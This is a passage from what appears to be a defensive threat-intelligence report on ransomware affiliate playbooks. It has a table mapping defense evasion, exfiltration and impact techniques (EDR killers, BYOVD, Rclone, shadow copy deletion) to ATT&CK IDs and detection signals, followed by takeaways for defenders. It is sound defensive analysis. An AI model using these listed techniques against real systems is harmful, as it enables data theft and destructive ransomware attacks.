| Defense Evasion | BYOVD, EDRKillShifter, EDRSilencer, KillAV tools, wevtutil log clearing, process injection | T1562.001, T1068, T1014 | Unexpected driver load; security process termination; event log clearing; EDR agent going silent |
| Exfiltration | Rclone, WinRAR/7-Zip, FileZilla, Ngrok, bitsadmin, robocopy, cloud drive abuse | T1048, T1567, T1041 | Large outbound data transfer; Rclone or cloud sync to unknown endpoint; archive tool execution; Ngrok tunnel |
| Impact | GPO deployment, PsExec batch, ESXi direct targeting, WMIC remote exec, backup deletion (vssadmin, wbadmin) | T1486, T1490, T1489 | Mass file modification events; shadow copy deletion; GPO change pushing executables; service mass-stop |
Key Takeaways
- The playbook is shared, not group-specific. Affiliates carry their tradecraft between platforms. The same LOTL techniques, credential theft tools, and BYOVD drivers appear in intrusions attributed to different RaaS brands because the same affiliates are running them. Defending against the technique is more durable than defending against a specific group's known IOCs.
- IABs have industrialized the hardest part of the attack. Affiliates no longer need to compromise the perimeter themselves. Access is a purchasable commodity, with corporate network footholds trading for as little as a few hundred dollars. The initial access problem is no longer primarily a malware problem — it is an exposure management and credential protection problem.
- Living off the land is not a sophistication indicator. The same tools used by experienced affiliates are used by low-skill affiliates because the tools are freely available, well-documented, and trusted by default. An attacker using only PowerShell, WMI, and PsExec is not necessarily less dangerous than one deploying custom malware — they may be harder to detect.
- BYOVD has crossed from advanced to standard. EDR killers using kernel-level driver abuse are documented in commodity ransomware operations, not just advanced groups. The February 2026 shift to embedding the vulnerable driver within the ransomware payload itself compresses the detection window further. Organizations should validate their kernel driver protection controls proactively, not after an incident.
- Exfiltration precedes encryption in more than 70% of attacks. Backup and recovery strategies are necessary but not sufficient. A successful restore after ransomware does not prevent the data extortion leverage that was established before encryption. Data exfiltration detection — anomalous bulk transfers, unexpected cloud sync activity, archive tool usage — needs to be a first-class detection priority, not an afterthought.
- Detection requires behavioral analysis, not signature matching. Every phase of the affiliate playbook uses legitimate tools. Effective detection is behavioral: baselining what normal looks like for each account, protocol, and data flow in your environment, and alerting on deviations — not on the presence of a specific binary.